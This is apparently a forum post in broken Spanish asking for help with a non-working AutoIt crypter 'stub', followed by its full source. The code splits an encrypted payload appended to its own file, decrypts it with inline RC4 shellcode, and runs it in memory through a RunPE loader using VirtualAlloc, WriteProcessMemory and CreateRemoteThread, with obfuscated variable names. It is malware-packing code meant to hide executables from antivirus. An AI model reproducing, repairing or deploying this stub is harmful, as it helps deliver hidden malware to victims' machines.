yo tengo una duda sobre stub au3 creo que submain no estas coyecto no me responde con cliente com keys y separator iguais diferentes no se oque puede ser ... estas con rc4 simple , con runPE de m3 ..
Func VgKtf()
$60yPt = @ScriptFullPath
$417H3 = "separator"
$f3cAq = FileRead($60yPt)
$VSR07 = StringSplit($f3cAq, $417H3, 1)
Call (hjsoia ( NAKLna($VSR07[2] ,"key")))
EndFunc
Func NAKLna ($FBD0f,$zU6Pu)
Local $5l5tj = "0xC81001006A006A005356578B551031C989C84989D7F2AE484829C88945F085C00F84DC000000B90001000088C82C0188840DEFFEFFFFE2F38365F4008365FC00817DFC000100007D478B45FC31D2F775F0920345100FB6008B4DFC0FB68C0DF0FEFFFF01C80345F425FF0000008945F48B75FC8A8435F0FEFFFF8B7DF486843DF0FEFFFF888435F0FEFFFFFF45FCEBB08D9DF0FEFFFF31FF89FA39550C76638B85ECFEFFFF4025FF0000008985ECFEFFFF89D80385ECFEFFFF0FB6000385E8FEFFFF25FF0000008985E8FEFFFF89DE03B5ECFEFFFF8A0689DF03BDE8FEFFFF860788060FB60E0FB60701C181E1FF0000008A840DF0FEFFFF8B750801D6300642EB985F5E5BC9C21000"
Local $0af8l = DllStructCreate("byte[" & BinaryLen($5l5tj) &"]")
DllStructSetData($0af8l , 1 , $5l5tj)
Local $AR88R = DllStructCreate("byte[" & BinaryLen($FBD0f) & "]")
DllStructSetData ($AR88R,1,$FBD0f)
DllCall ("user32.dll" ,"none","CallWindowProc","ptr",DllStructGetPtr($0af8l),"ptr",DllStructGetPtr($AR88R),"int",BinaryLen($zU6Pu),"str",$5l5tj,"int",0)
Local $dmJAX = DllStructGetData($AR88R,1)
$AR88R = 0
Return $dmJAX
EndFunc
Func hjsoia($hjLeu )
Local $tRA49 , $BIseq , $NAKPs , $2w9em , $Z9c7n , $0D0P4 , _
$D8u3y ,$A90tw ,$bNM4D,$jN48G ,$4iM6Q ,$bNM4D[19], $5CVtW, $5CVtW , _
$IRSAe , $6qf6k , $1L2tX , $mfq3B , $3nUeD , $5KOex
Local Const $8bqAS = "kernel32"
If Not $hjLeu <> "" Then
ConsoleWrite('Binary buffer not Exists , Choose an .exe File to Read First ...' )
Exit
EndIf
$bNM4D[1] = '0X8BEC81C4A4FAFFFF8945FCE81B0200008985CCFDFFFFBBF20F56C68B95CCFDFFFFE819020000894'
$bNM4D[2] = '5F8BBA98B802D8B95CCFDFFFFE8060200008945F4BB853BAEDB8B95CCFDFFFFE8F30100008945F0BB'
$bNM4D[3] = '9335DF858B95CCFDFFFFE8E00100008945ECBB8DCBB65D8B95CCFDFFFFE8CD0100008945E8BB5313C'
$bNM4D[4] = '1788B95CCFDFFFFE8BA0100008945E4BB8ADBDFA58B95CCFDFFFFE8A70100008945E0BB2E0550C88B'
$bNM4D[5] = '95CCFDFFFFE8940100008945DCBB85A116A28B95CCFDFFFFE881010000E8060000006E74646C6C005'
$bNM4D[6] = 'F57FFD08985D0FDFFFFBB8BE3CD418BD0E8600100008945D8BB39230D2C8B95D0FDFFFFE84D010000'
$bNM4D[7] = '8945D468000200008D85D4FDFFFF506A00FF55F86A448D8588FDFFFF50FF55D4FF55F48BC88D8578F'
$bNM4D[8] = 'DFFFF508D8588FDFFFF506A006A006A046A006A006A00518D85D4FDFFFF50FF55F068CC0200008D85'
$bNM4D[9] = 'A4FAFFFF50FF55D4C785A4FAFFFF020001008D85A4FAFFFF50FFB57CFDFFFFFF55EC64A1300000008'
$bNM4D[10] = 'B400C8B40148B401050FFB578FDFFFFFF55D88B7DFC037F3C6A406800300000FF7750FF7734FFB57'
$bNM4D[11] = '8FDFFFFFF55E8898574FDFFFF6A00FF7754FF75FCFFB574FDFFFFFFB578FDFFFFFF55E48D4718898'
$bNM4D[12] = '570FDFFFF0FB74714018570FDFFFF33C033F633C9EB296BC628038570FDFFFF8B9D74FDFFFF03580'
$bNM4D[13] = 'C8B55FC0350146A00FF70105253FFB578FDFFFFFF55E446663B770672D18B8574FDFFFF034728898'
$bNM4D[14] = '554FBFFFF8D85A4FAFFFF50FFB57CFDFFFFFF55E0FFB57CFDFFFFFF55DCC9C364A1300000008B400'
$bNM4D[15] = 'C8B400C8B008B008B4018C3558BEC83C4F4528955FC8B4A3C03CA894DF48B497803CA894DF88B511'
$bNM4D[16] = '88B4920034DFC33FF8B310375FC33C051AC8BC803F8D3C785C075F5593BFB741083C1044A75E0BAC'
$bNM4D[17] = '258621B5A33C0C9C38B45FC8B4DF88B59188B492403C82BDAD1E303CB0FB7198B4DF88B491C03C8C'
$bNM4D[18] = '1E30203CB03015AC9C300'
For $uti72 = 1 to 18
$5CVtW &= $bNM4D[$uti72]
Next
$4iM6Q = StringLen($hjLeu)
$2CPPM = StringLen($5CVtW) / 2
$2w9em = DllStructCreate ("Boolean BinaryBuffer[" & $4iM6Q & "];Boolean ShellCodeBuffer[" & $2CPPM - 1 & "];Boolean AsmCode[15]")
$Z9c7n = DllStructGetPtr ($2w9em , 1)
$0D0P4 = DllStructGetPtr ($2w9em , 2)
$D8u3y = DllStructGetSize ($2w9em)
$1L2tX = DllCall($8bqAS, "ptr", "VirtualAlloc", "ptr", 0, "dword_ptr", $D8u3y, "dword", 4096, "dword", 64)
If IsArray($1L2tX) Then
$A90tw = $1L2tX[0]
Else
ConsoleWrite ('Unable to Allocate Virtual Memory')
Exit
EndIf
$bNM4D = $A90tw + $4iM6Q
$IRSAe = "0X8D05"
For $uti72 = 11 To 3 Step -2
$IRSAe &= StringMid ($A90tw , $uti72 , 2)
Next
$IRSAe &= "8D1D"
For $uti72 = 11 To 3 Step -2
$IRSAe &= StringMid ($bNM4D , $uti72 , 2)
Next
$IRSAe &= "FFD3C3"
$6qf6k = StringLen($IRSAe) / 2 - 1
$mfq3B = DllStructCreate("Boolean AsmCopyMemory[" & $6qf6k & "]")
DllStructSetData($mfq3B, 1, $IRSAe)
$3nUeD = DllStructGetPtr($2w9em, 3)
$5KOex = DllStructGetPtr($mfq3B , 1)
CopyMemory($3nUeD, $5KOex , $6qf6k)
DllStructSetData ($2w9em, 1 ,$hjLeu)
DllStructSetData ($2w9em, 2 ,$5CVtW)
$tRA49 = DllCall($8bqAS, "int", "OpenProcess", "int", 0x001f0fff, "int", 0, "int", @AutoItPID)
If IsArray($tRA49) And Not @error Then
$tRA49 = $tRA49[0]
DllCall($8bqAS, "int", "WriteProcessMemory", "int", $tRA49, "ptr", $A90tw, "ptr", $Z9c7n, "int", $D8u3y, "int", 0)
$jN48G = $bNM4D + $2CPPM - 1
Else
ConsoleWrite('Unable to Open Process')
Exit
Endif
$BIseq = DllCall($8bqAS, "int", "CreateRemoteThread", "int", $tRA49, "ptr", 0, "int", 0, "int", $jN48G, "ptr", 0, "int", 0, "int", 0)
if IsArray ($BIseq) And Not @error Then
$BIseq = $BIseq[0]
DllCall($8bqAS, "int", "WaitForSingleObject", "int", $BIseq, "int", 100)
DllCall($8bqAS, "int", "CloseHandle", "int", $tRA49)
DllCall($8bqAS, "bool", "VirtualFree", "ptr", $A90tw, "dword_ptr", 0, "dword", 0X8000)
Else
ConsoleWrite ('Unable to Create Thread')
Exit
EndIf
EndFunc
Func CopyMemory($b2mP0,$pOqHC,$uqken)
local $e8t28 = "0x8B7C24048B74240831C98B4C240CF3A4C300000000000000"
Local $bO2P8 = DllStructCreate("byte[" & BinaryLen($e8t28) & "]")
DllStructSetData($bO2P8, 1, $e8t28)
Local $O9oP0 = DllCall("user32.dll", "int", "CallWindowProcW", _
"ptr", DllStructGetPtr($bO2P8), _
"ptr", $b2mP0, _
"ptr", $pOqHC, _
"int", $uqken, _
"int", 0)
EndFunc
